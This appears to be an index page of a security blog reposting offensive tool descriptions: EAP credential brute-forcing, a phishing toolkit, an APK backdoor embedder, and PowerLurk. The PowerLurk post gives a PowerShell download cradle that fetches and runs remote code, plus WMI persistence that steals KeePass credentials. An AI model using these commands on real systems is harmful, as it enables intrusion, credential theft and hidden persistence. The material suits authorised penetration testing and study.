Offensive Sec Blog

Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...

  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...

  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...

  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...

  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...

  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...

Thursday, December 1, 2016

Automated Brute-Force Login Attacks Against EAP Networks - Auto_EAP

      ,       No comments    


Auto_EAP.py is a script designed to perform automated brute-force authentication attacks against various types of EAP networks. These types of wireless networks provide an interface to facilitate password guessing of domain credentials as radius servers check authentication against Active Directory. Using the python library wpaspy, created by Jouni Malinen j@w1.fi to interact with the wpa_supplicant daemon, automated authentication attacks can be preformed with the intent of not causing account lock-outs.

 Demo 
./Auto_EAP.py -s HoneyPot -K WPA-EAP -E PEAP -U test.txt -p Summer2016 -i wlan0
Initialized...
Trying Username Alice with Password test: SUCCESS
Trying Username Bob with Password test: FAILED
Trying Username Charles with Password test: FAILED
Trying Username David with Password test: SUCCESS
Completed

 Installation
Run 'RunMeFirst.py' within the root directory of Auto_EAP. This will compile the wpaspy library as well as setup a stand alone wpa_supplicant.conf file that Auto_EAP.py will use for testing, leaving the system’s wpa_supplicant config file untouched.

Help 
./Auto_EAP.py -h
usage: Auto_EAP.py [-h] -i Interface -s SSID -U Usernamefile -p Password -K
                   Key_mgmt -E Eap_type

optional arguments:
  -h, --help            show this help message and exit
  -i Interface, --interface Interface
                        The Interface to use
  -s SSID, --ssid SSID  The SSID to attack
  -U Usernamefile, --User Usernamefile
                        Path to username file
  -p Password, --password Password
                        Password to use
  -K Key_mgmt, --key_mgmt Key_mgmt
                        Key_Management type to use
  -E Eap_type, --eap_type Eap_type
                        Eap type to use

 Todo list
  • [✓] Resoved bug with .a type wireless cards (Shout out to Havok0x90 for his help in resolving this issue)
  • [-] Add multi-threading functionality
  • [-] Add support for password lists


Share:

Phishing Campaign Toolkit - King Phisher 1.5.2

            No comments    


King Phisher is a tool for testing and promoting user awareness by simulating real world phishing attacks. It features an easy to use, yet very flexible architecture allowing full control over both emails and server content. King Phisher can be used to run campaigns ranging from simple awareness training to more complicated scenarios in which user aware content is served for harvesting credentials.
King Phisher is only to be used for legal applications when the explicit permission of the targeted organization has been obtained.
Get the latest stable version from the GitHub Releases Page or use git to checkout the project from source.
For instructions on how to install, please see the INSTALL.md file. After installing, for instructions on how to get started please see the wiki .

Feature Overview
  • Run multiple phishing campaigns simultaneously
  • Send email with embedded images for a more legitimate appearance
  • Optional Two-Factor authentication
  • Credential harvesting from landing pages
  • SMS alerts regarding campaign status
  • Web page cloning capabilities
  • Integrated Sender Policy Framework (SPF) checks
  • Geo location of phishing visitors
  • Send email with calendar invitations

Plugins
Both the client and server can be extended with functionality provided by plugins. A small number of plugins are packaged with King Phisher and additional ones are available in the Plugins repository .

Template Files
Template files for both messages and server pages can be found in the separate King Phisher Templates repository . Any contributions regarding templates should also be submitted via a pull request to the templates repository.

Message Template Variables
The client message templates are formatted using the Jinja2 templating engine and support a number of variables. These are included here as a reference, check the templates wiki page for comprehensive documentation.
Variable Name Variable Value
client.company_name The target's company name
client.email_address The target's email address
client.first_name The target's first name
client.last_name The target's last name
client.message_id The unique tracking identifier (this is the same as uid)
sender.email The email address in the "Source Email (MIME)" field
sender.friendly_alias The value of the "Friendly Alias" field
sender.reply_to The value of the "Reply To" field
url.tracking_dot URL of an image used for message tracking
url.webserver Phishing server URL with the uid parameter
url.webserver_raw Phishing server URL without any parameters
tracking_dot_image_tag The tracking image in a preformatted <img /> tag
uid The unique tracking identifier (this is the same as client.message_id)
The uid is the most important, and must be present in links that the messages contain.

Documentation
Documentation for users of the application is provided on the project's wiki page . This includes steps to help new users get started with their first campaigns. Additional technical documentation intended for developers is kept seperate as outlined in section below.

Code Documentation
King Phisher uses Sphinx for internal technical documentation. This documentation can be generated from source with the command sphinx-build -b html docs/source docs/html . The latest documentation is kindly hosted on ReadTheDocs at king-phisher.readthedocs.io .

License
King Phisher is released under the BSD 3-clause license, for more details see the LICENSE file.

Credits
Special Thanks (QA / Beta Testing):
  • Jake Garlie - jagar
  • Jeremy Schoeneman - Shad0wman
  • Ken Smith - p4tchw0rk
  • Brianna Whittaker
King Phisher Development Team:


Share:

The Ultimate WordPress Audit Trail Plugin - WP Security Audit Log

            No comments    
The WP Security Audit Log plugin is a WordPress plugin that keeps an audit trail of everything that happens on your WordPress and WordPress multisite network. There are several WordPress audit trail / log plugins available, tough we chose to review WP Security Audit Log because it is has the most comprehensive logging and the best coverage of WordPress changes. It is also the most complete and mature WordPress audit trail solution. 

Why Do You Need a WordPress Audit Trail?

First things first, why would you need a WordPress audit trail? A WordPress audit trail is a record, or better a log of every change that happened on your WordPress, similar to Syslog on Linux/Unix or the Events Viewer on Microsoft Windows. The WordPress audit trail can be used to:
  • Keep track of users’ productivity (ideal for multi-users setups),
  • Ease the troubleshooting in case something is wrong with the WordPress website,
  • Identify any possible malicious WordPress hack attacks before they actually happen,
  • Catch hackers red handed if they manage to hack into your WordPress,
  • Do all the forensics to track back which security hole the hackers exploited so you can close it down.

The above are just a few reasons mostly related to WordPress security of why you would need to keep a record of all the changes that happen on your WordPress. There are many other reasons related to business and operations, for example to ensure that your business WordPress website meets today’s stringent regulatory compliance regulations, in case you’re using WordPress for your business website.

Getting Started with the WP Security Audit Log Plugin

Install the WP Security Audit Log plugin from your Plugins page in your WordPress dashboard and activate it. By default the WP Security Audit Log will keep track of all these changes on your WordPress. You can also watch the short video below for a quick introduction.


Comprehensive Tracking of WordPress Changes

The comprehensive WordPress audit trail is what sets this plugin apart from the competition. For example while the other audit log plugins simply record that a post was updated, WP Security Audit Log tells you what exactly changed in the post. For example in the screenshot below we can see that the plugin kept a record when all of the below changes happened:

  • User opened the post in the editor,
  • Author of the post was changed,
  • Title of the post was changed,
  • URL of the post was changed



In case the content is changed the alert reporting the change in the plugin will allow you to see the revision of changes, as per the below screenshot.


Fully Configurable WordPress Audit Trail Plugin

WP Security Audit Log is also a fully configurable WordPress plugin, therefore it allows you to customize the plugin’s functionality to suite your own needs. Below is an overview of what you can configure.

Enable / Disable Alerts

The plugin keeps a record of all these WordPress changes. If for example you do not want to keep a record each time a logged in user, or a website visitor requests a non-existing page (HTTP 404 Error) navigate to the Enable/Disable Alerts > System Activity tab and disable Alert 6007 as shown in the below screenshot.


Browse through the different categories to find the change you would like to disable or enable back.

Generic Plugin Settings

You can also configure things such as:
  • Support for WAFs and reverse proxy (more information on this option),
  • Specify who can access the plugin’s settings and manage it,
  • Enable logging, developer options,
  • And much more.

Audit Trail Settings

In the Audit Log / Trail settings you can configure settings related to the WordPress audit trail, such as:
  • Automatic pruning of alerts from the audit trail,
  • Who can view the WordPress audit trial,
  • The time zone the plugin uses to timestamp the WordPress changes etc.

Exclude Objects from Monitoring

You can also exclude the below from being recorded in the WordPress audit trial:
  • Specific users or roles,
  • Custom fields,
  • IP addresses.

Beefing Up the WordPress Audit Trail

Keeping an audit trail of all the changes that happen is a WordPress security best practice but who has the time to check the log every few minutes? The good news is that you do not need to. WP Security Audit Log has a number of premium add-ons so you can:
  • Configure email notifications so you are alerted instantly via email of important changes on your WordPress,
  • Do free text based searches so you can find that specific change when troubleshooting an issue,
  • Generate reports for managers, to monitor users’ productivity and for regulatory compliance reasons,
  • See who is logged in and block multiple sessions from the same username.

 You can add all of the above functionality to get the best out of your WordPress audit trail solution by purchasing the All Add-Ons bundle. Prices start from as low as $89.


Share:

Friday, November 18, 2016

Black Box vBulletin Vulnerability Scanner - VBScan 0.1.7

      , , ,       No comments    



OWASP VBScan (short for [VB]ulletin Vulnerability [Scan]ner) is an opensource project in perl programming language to detect VBulletin CMS vulnerabilities and analyses them .

Why OWASP VBScan ?
If you want to do a penetration test on a vBulletin Forum, OWASP VBScan is Your best shot ever! This Project is being faster than ever and updated with the latest VBulletin vulnerabilities.

usage : 
./vbscan.pl <target>
./vbscan.pl http://target.com/vbulletin

OWASP VBScan 0.1.7 introduction (Youtube)


What’s New in Version 0.1.7 [Dennis Ritchie]
OWASP VBScan 0.1.7 [Larry Wall]
  • Updated exploit database
  • Compatible With Windows [Linux,OSX,Windows]
  • Added Full Path Disclosure (FPD) module
  • Added firewall detect/bypass module
  • Optimized version checker module engine [#12 issue]
  • Upgrade config finder module
  • Random user agent module set as default setting
  • Added HTML Report


Share:

Lightweight and Powerful Penetration Testing OS - DracOS

      , , , , ,       No comments    


Dracos Linux ( www.dracos-linux.org ) is the Linux operating system from Indonesian , open source is built based on the Linux From Scratch under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing (penetration testing). Dracos linux in Arm by hundreds hydraulic pentest, forensics and reverse engineering. Does not use a GUI-based tools-tools and just have the software using the CLI (command line interface) to perform its operations. Now Dracos currently already up to version 2.0 with the code name "Leak".

Screenshot

 Teaser

As the target of development

Education
Dracos Linux is purposed as an educational,especially to recognize the operation system of linux and we respect ethical hacking.

Build from source
had always been built from codes instead of installer,this will stimulate users in indonesia to stay creative and to build the spirit of opensource.

Repository
even though proportionally based on codes,Dracos Linux still intends to construct the repository to build up the processes Like Venomizer

Heavy Control
We need to recognize this operating system Very Dificult Because Dracos in build from source code, thus forcing us to compile when installing a package or software, which of course will arise the possibility of system failure and other system vulnerabilities.

Always from terminal
None of every singel tool that was installed inside the OS uses GUI. CLI will always consider to particularly openbox to ease the users in need of multi terminal in applying Penetration Testing

Penetration Tools List
Link : http://dev.dracos-linux.org/projects/dracoslinux/wiki/Penetration_Testing
  • Information Gathering
  • Vulnerability Assessment
  • Web Attack
  • Exploitation Testing
  • Privilege Escalation
  • Password Attack
  • Social Engineering
  • Man In The Middle Attack
  • Stress Testing
  • Wireless Attack
  • Maintaining Access
  • Forensics Tools
  • Reverse Engineering
  • Malware Analysis
  • Covering Track

Share:

Sunday, November 6, 2016

Mirai Source Code Released

      , ,       No comments    



The IoT Botnet Mirai’s source code has been published online by its author along with configuration and set-up details. Naturally, web security analysts are expecting a series of online attacks from malicious threat actors. The reason behind their concerns is that this code can easily convert any hackable, that is, unsecured or unprotected devices like the routers, web cameras and phone, etc., into DDoS Bots. These bots can then be used to attack websites and to take them offline.





Share:

Tuesday, November 1, 2016

Modern mass media manipulation methods are types of distraction - Media Manipulation

      , , , , ,       No comments    





Media manipulation is a series of related techniques in which partisans create an image or argument that favours their particular interests. Such tactics may include the use of logical fallacies and propaganda techniques, and often involve the suppression of information or points of view by crowding them out, by inducing other people or groups of people to stop listening to certain arguments, or by simply diverting attention elsewhere. In Propaganda: The Formation of Men's Attitudes, Jacques Ellul writes that public opinion can only express itself through channels which are provided by the mass media of communication – without which there could be no propaganda. It is used within public relations, propaganda, marketing, etc. While the objective for each context is quite different, the broad techniques are often similar.

watch the video





By OffSec
Share:

An utility like pkg-audit for Arch Linux - arch-audit

      ,       No comments    



An utility like pkg-audit for Arch Linux. Based on Arch CVE Monitoring Team data

Uses data collected by the awesome Arch CVE Monitoring Team .

 Installation

From AUR
The PKGBUILD is available on AUR .
After the installation just execute arch-audit .

From sources 
git clone https://github.com/ilpianista/arch-audit
cd arch-audit
cargo build
cargo run

 Example output 
$ arch-audit
Package libwmf is affected by ["CVE-2009-1364", "CVE-2006-3376", "CVE-2007-0455", "CVE-2007-2756", "CVE-2007-3472", "CVE-2007-3473", "CVE-2007-3477", "CVE-2009-3546", "CVE-2015-0848", "CVE-2015-4588", "CVE-2015-4695", "CVE-2015-4696"]. VULNERABLE!
Package libtiff is affected by ["CVE-2016-5875", "CVE-2016-5314", "CVE-2016-5315", "CVE-2016-5316", "CVE-2016-5317", "CVE-2016-5320", "CVE-2016-5321", "CVE-2016-5322", "CVE-2016-5323", "CVE-2016-5102", "CVE-2016-3991", "CVE-2016-3990", "CVE-2016-3945", "CVE-2016-3658", "CVE-2016-3634", "CVE-2016-3633", "CVE-2016-3632", "CVE-2016-3631", "CVE-2016-3625", "CVE-2016-3624", "CVE-2016-3623", "CVE-2016-3622", "CVE-2016-3621", "CVE-2016-3620", "CVE-2016-3619", "CVE-2016-3186", "CVE-2015-8668", "CVE-2015-7313", "CVE-2014-8130", "CVE-2014-8127", "CVE-2010-2596", "CVE-2016-6223"]. VULNERABLE!
Package libtiff is affected by ["CVE-2015-7554", "CVE-2015-8683"]. VULNERABLE!
Package jasper is affected by ["CVE-2015-8751"]. VULNERABLE!
Package jasper is affected by ["CVE-2015-5221"]. VULNERABLE!
Package jasper is affected by ["CVE-2015-5203"]. VULNERABLE!
Package lib32-openssl is affected by ["CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6306"]. Update to 1:1.0.2.i-1!
Package wireshark-cli is affected by ["CVE-2016-7180", "CVE-2016-7175", "CVE-2016-7176", "CVE-2016-7177", "CVE-2016-7178", "CVE-2016-7179"]. Update to 2.2.0-1!
Package wpa_supplicant is affected by ["CVE-2016-4477", "CVE-2016-4476"]. VULNERABLE!
Package openssl is affected by ["CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6306"]. Update to 1.0.2.i-1!
Package crypto++ is affected by ["CVE-2016-7420"]. VULNERABLE!
Package bzip2 is affected by ["CVE-2016-3189"]. VULNERABLE!
Package libimobiledevice is affected by ["CVE-2016-5104"]. VULNERABLE!
Package libusbmuxd is affected by ["CVE-2016-5104"]. VULNERABLE!
Package gdk-pixbuf2 is affected by ["CVE-2016-6352"]. VULNERABLE!

$ arch-audit --upgradable --quiet
wireshark-cli>=2.2.0-1
openssl>=1.0.2.i-1
lib32-openssl>=1:1.0.2.i-1

$ arch-audit -uf "%n|%c"
openssl|CVE-2016-2177,CVE-2016-2178,CVE-2016-2179,CVE-2016-2180,CVE-2016-2181,CVE-2016-2182,CVE-2016-2183,CVE-2016-6302,CVE-2016-6303,CVE-2016-6304,CVE-2016-6306
wireshark-cli|CVE-2016-7180,CVE-2016-7175,CVE-2016-7176,CVE-2016-7177,CVE-2016-7178,CVE-2016-7179
lib32-openssl|CVE-2016-2177,CVE-2016-2178,CVE-2016-2179,CVE-2016-2180,CVE-2016-2181,CVE-2016-2182,CVE-2016-2183,CVE-2016-6302,CVE-2016-6303,CVE-2016-6304,CVE-2016-6306



Share:

Android APK Backdoor Embedder - Spade

      , ,       No comments    


Quick and handy APK backdoor embedder with metasploit android payloads.

 Requirements

Installation and execution
Then you can download smap by cloning the Git repository: 
git clone https://github.com/suraj-root/spade.git
cd spade/
./spade.py

 Demo video
asciicast

Video YouTube:


Share:

Exploit Network and Gathering Information with Nmap - Dracnmap

      , , ,       No comments    



Dracnmap is an open source program which is using to exploit the network and gathering information with nmap help. Nmap command comes with lots of options that can make the utility more robust and difficult to follow for new users. Hence Dracnmap is designed to perform fast scaning with the utilizing script engine of nmap and nmap can perform various automatic scanning techniques with the advanced commands.

 Screenshot


Getting Started
git clone https://github.com/Screetsec/Dracnmap.git
cd Dracnmap
chmod +x Dracnmap.sh
sudo ./Dracnmap.sh or sudo su ./Dracnmap.sh

Requirements
  • A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling / Cyborg / Parrot / Dracos / BackTrack / Backbox / and another operating system ( linux )
  • Must install nmap

Tutorial
you can visit my channel : https://www.youtube.com/channel/UCpK9IXzLMfVFp9NUfDzxFfw

Credits


Share:

KNXnet/IP scanning and auditing tool for KNX home automation installations - KNXmap

            No comments    


A tool for scanning and auditing KNXnet/IP gateways on IP driven networks. KNXnet/IP defines Ethernet as physical communication media for KNX (EN 50090, ISO/IEC 14543). KNXmap also allows to scan for devices on the KNX bus via KNXnet/IP gateways. In addition to scanning, KNXmap supports other modes to interact with KNX gateways like monitor bus messages or write arbitrary values to group addresses.

Compatibility
KNXmap requires Python 3.3 or newer. There are no external dependencies, everything is included in the standard library.
Note : Users of Python 3.3 need to install the asyncio module from PyPI .

Usage
Invoke knxmap.py locally or install it: 
python setup.py install

 Documentation
The documentation is available in the repository wiki .

Hacking
Enable full debugging and verbosity for development: 
PYTHONASYNCIODEBUG=1 knxmap.py -v scan 192.168.178.20 1.1.0-1.1.6 --bus-info


Share:

Tuesday, October 25, 2016

Malicious WMI Events using PowerShell - PowerLurk

      , ,       No comments    


PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions. The goal is to make WMI events easier to fire off during a penetration test or red team engagement. Please see my post Creeping on Users with WMI Events: Introducing PowerLurk for more detailed information: https://pentestarmoury.com/2016/07/13/151/

To use PowerLurk, you must import the PowerLurk.ps1 module into your instance of PowerShell. This can be done a couple of ways:
Import locally 
    PS> powershell.exe -NoP -Exec ByPass -C Import-Module c:\\temp\\PowerLurk.ps1
Download Cradle
    PS> powershell.exe -NoP -C "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/PowerLurk.ps1'); Get-WmiEvent"

Get-WmiEvent
By default, Get-WmiEvent queries WMI for all __FilterToConsumerBinding instances and associated __EventFilter, and __EventConsumer instances. Objects returned can be deleted by piping to Remove-WmiObject.
Return all active WMI event objects with the name 'RedTeamEvent' 
    Get-WmiEvent -Name RedTeamEvent
Delete 'RedTeamEvent' WMI event objects
    Get-WmiEvent -Name RedTeamEvent | Remove-WmiObject

Register-MaliciousWmiEvent
This cmdlet is the core of PowerLurk. It takes a command, script, or scriptblock as the action and a precanned trigger then creates the WMI Filter, Consumer, and FilterToConsumerBinding required for a fully functional Permanent WMI Event Subscription. A number of WMI event triggers, or filters, are preconfigured. The trigger must be specified with the -Trigger parameter. There are three consumers to choose from, PermanentCommand, PermanentScript, and LocalScriptBLock. Example usage:
Write the notepad.exe process ID to C:\temp\log.txt whenever notepad.exe starts 
    Register-MaliciousWmiEvent -EventName LogNotepad -PermanentCommand “cmd.exe /c echo %ProcessId% >> c:\\temp\\log.txt” -Trigger ProcessStart -ProcessName notepad.exe
Cleanup Malicious WMI Event
    Get-WmiEvent -Name LogNotepad | Remove-WmiObject

Add-KeeThiefLurker
creates a permanent WMI event that will execute KeeThief (See @Harmj0y's KeeThief at https://github.com/adaptivethreat/KeeThief ) 4 minutes after the 'keepass' process starts. This gives the target time to log into their KeePass database.
The KeeThief logic and its output are either stored in a custom WMI namespace and class or regsitry values. If a custom WMI namespace and class are selected, you have the option to expose that namespace so that it can be read remotely by 'Everyone'. Registry path and value names are customizable using the associated switches; however, this is optional as defaults are set. Example usage:
Add KeeThiefLurker event using WMI class storage 
    Add-KeeThiefLurker -EventName KeeThief -WMI
Query custom WMI class
    Get-WmiObject -Namespace root\software win32_WindowsUpdate -List
Extract KeeThief output from WMI class
    [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($(Get-WmiObject -Namespace root\software win32_WindowsUpdate -List).Properties['Output'].value))
Cleanup KeeThiefLurker
    Remove-KeeThiefLurker -EventName KeeThief -WMI


Share:
Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition